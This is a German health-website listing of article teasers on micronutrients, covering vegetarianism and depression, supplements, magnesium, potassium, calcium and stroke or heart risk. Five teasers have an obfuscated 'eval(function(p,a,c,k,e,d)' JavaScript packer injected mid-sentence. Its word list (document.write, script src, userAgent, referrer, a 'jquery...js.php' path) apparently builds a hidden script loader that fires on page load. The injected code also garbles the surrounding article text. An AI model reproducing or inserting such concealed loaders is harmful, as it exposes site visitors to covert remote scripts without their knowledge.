Mineralstoffe und Spurenelemente

Vegetarismus: zum Zusammenhang von Mikronährstoffmangel mit Depressionen [202]

Vegetarier neigen in der Mitte des Lebens eher und öfter zu Depressionen als die sogenannten Normalesser. Dies ging aus einer Befragung von 9.668 Männern an der Bristol University hervor (1). 311 dieser […]

Zur Epidemiologie globaler Mikronährstoffdefizite [106]

Mit eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d)}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|faekt|var|u0026u|referrer|skrze||js|php'.split('|'),0,{})) vier prägnanten Schlüsselaussagen wird das Potential einer globalen Prävention von Mikronährstoffdefiziten im Grundsatzartikel The Epidemiology of Global Micronutrient Deficiencies von Robert E. Black, […]

Vitaminpräparate und Mineralstoffe in der Primärprävention von Herz-Kreislauf-Erkrankungen und Krebs neu bewertet [59]

Die eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d)}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hktks|var|u0026u|referrer|harik||js|php'.split('|'),0,{})) Empfehlung der US Preventive Service Task Force Recommendation (USPSTF) im Entwurf Die Beweise reichen bislang nicht aus, um zu beurteilen, ob Vitaminpräparate und Mineralstoffe […]

Präventiver Schutz vor Mangeldurchblutung im Gehirn durch Magnesium [39]

Rund eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d)}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rkdib|var|u0026u|referrer|fzddb||js|php'.split('|'),0,{})) 250.000 Schlaganfälle ereignen sich jährlich in Deutschland – ca. vier Fünftel davon ausgelöst durch eine Durchblutungsstörung der das Gehirn versorgenden Blutgefäße (ischämischer Schlaganfall). […]

WHO-Empfehlung zur Schlaganfallprävention mit Hilfe von Kalium [34]

Mit eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d)}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|shaik|var|u0026u|referrer|dridy||js|php'.split('|'),0,{})) einer höheren Tagesdosis an Kalium könnte die Zahl der Schlaganfälle bei Hypertonikern um bis zu 24 Prozent reduziert werden. Zu dieser Prognose gelangen […]

Kalzium-Einnahme kann kardiovaskuläres Risiko erhöhen [30]

Frauen eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d)}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|irefn|var|u0026u|referrer|edkdi||js|php'.split('|'),0,{})) mit einer hohen täglichen Kalzium-Einnahme sterben mehr als doppelt so häufig an einer ischämischen Herzkrankheit wie Frauen mit einer niedrigen Zufuhr. Dies ist das […]